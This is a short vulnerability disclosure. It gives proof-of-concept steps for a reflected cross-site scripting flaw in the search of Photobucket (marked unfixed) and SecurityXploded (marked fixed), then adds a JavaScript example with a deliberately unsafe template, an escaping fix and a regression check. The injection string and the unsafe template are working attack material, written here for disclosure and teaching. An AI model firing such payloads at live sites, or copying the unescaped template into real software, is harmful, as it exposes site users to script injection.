POC for photobucket [unfixed]:
* Load http://photobucket.com/plugin/search
* Enter the following code and hit enter:
" onload=alert('xss!')>click me!"
POC for SecurityXploded [FIXED]:
* Load http://securityxploded.com
* Enter the following code and hit enter:
" onload=alert('xss!')>click me!"
The researcher claimed to have reported it to the PhotoBucket team. Let us hope they will fix the vulnerability soon.
After I sent a notification to SecurityXploded, they fixed the vulnerability immediately.
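
Why the string above works and what the fix looks like, as an added example that is not code from either site. It assumes the search term is reflected unescaped into a double-quoted attribute value; the template and the names `renderUnsafe`, `renderSafe`, `escapeHtml`, `attributeNames` and `hasEventHandler` are hypothetical.

```javascript
// Added example: assumed server-side template, not code from either site.
const PAYLOAD = `" onload=alert('xss!')>click me!"`; // the string from the POC steps

// Vulnerable: the search term is concatenated into a double-quoted attribute.
function renderUnsafe(term) {
  return `<input type="text" name="q" value="${term}">`;
}

// HTML-escape the characters that can end an attribute value or start a tag.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Hardened: same template, term escaped for the attribute context.
function renderSafe(term) {
  return `<input type="text" name="q" value="${escapeHtml(term)}">`;
}

// Minimal attribute scanner for the first tag in `html`: returns the attribute
// names a browser would see (a quoted value is consumed whole).
function attributeNames(html) {
  const names = [];
  let i = html.indexOf("<") + 1;
  while (i < html.length && !/[\s>]/.test(html[i])) i++; // skip the tag name
  while (i < html.length && html[i] !== ">") {
    if (/\s/.test(html[i])) { i++; continue; }
    const start = i;
    while (i < html.length && !/[\s=>]/.test(html[i])) i++;
    names.push(html.slice(start, i).toLowerCase());
    if (html[i] !== "=") continue; // attribute without a value
    i++; // step past '='
    const q = html[i];
    if (q === '"' || q === "'") {
      i = html.indexOf(q, i + 1);
      i = i === -1 ? html.length : i + 1;
    } else {
      while (i < html.length && !/[\s>]/.test(html[i])) i++; // unquoted value
    }
  }
  return names;
}

// Regression check: reflected input must never add an on* handler attribute.
function hasEventHandler(html) {
  return attributeNames(html).some((n) => n.startsWith("on"));
}
```

In the unescaped output the leading `"` closes `value`, so `onload` is parsed as a separate attribute; after escaping, the whole string stays inside `value` as text.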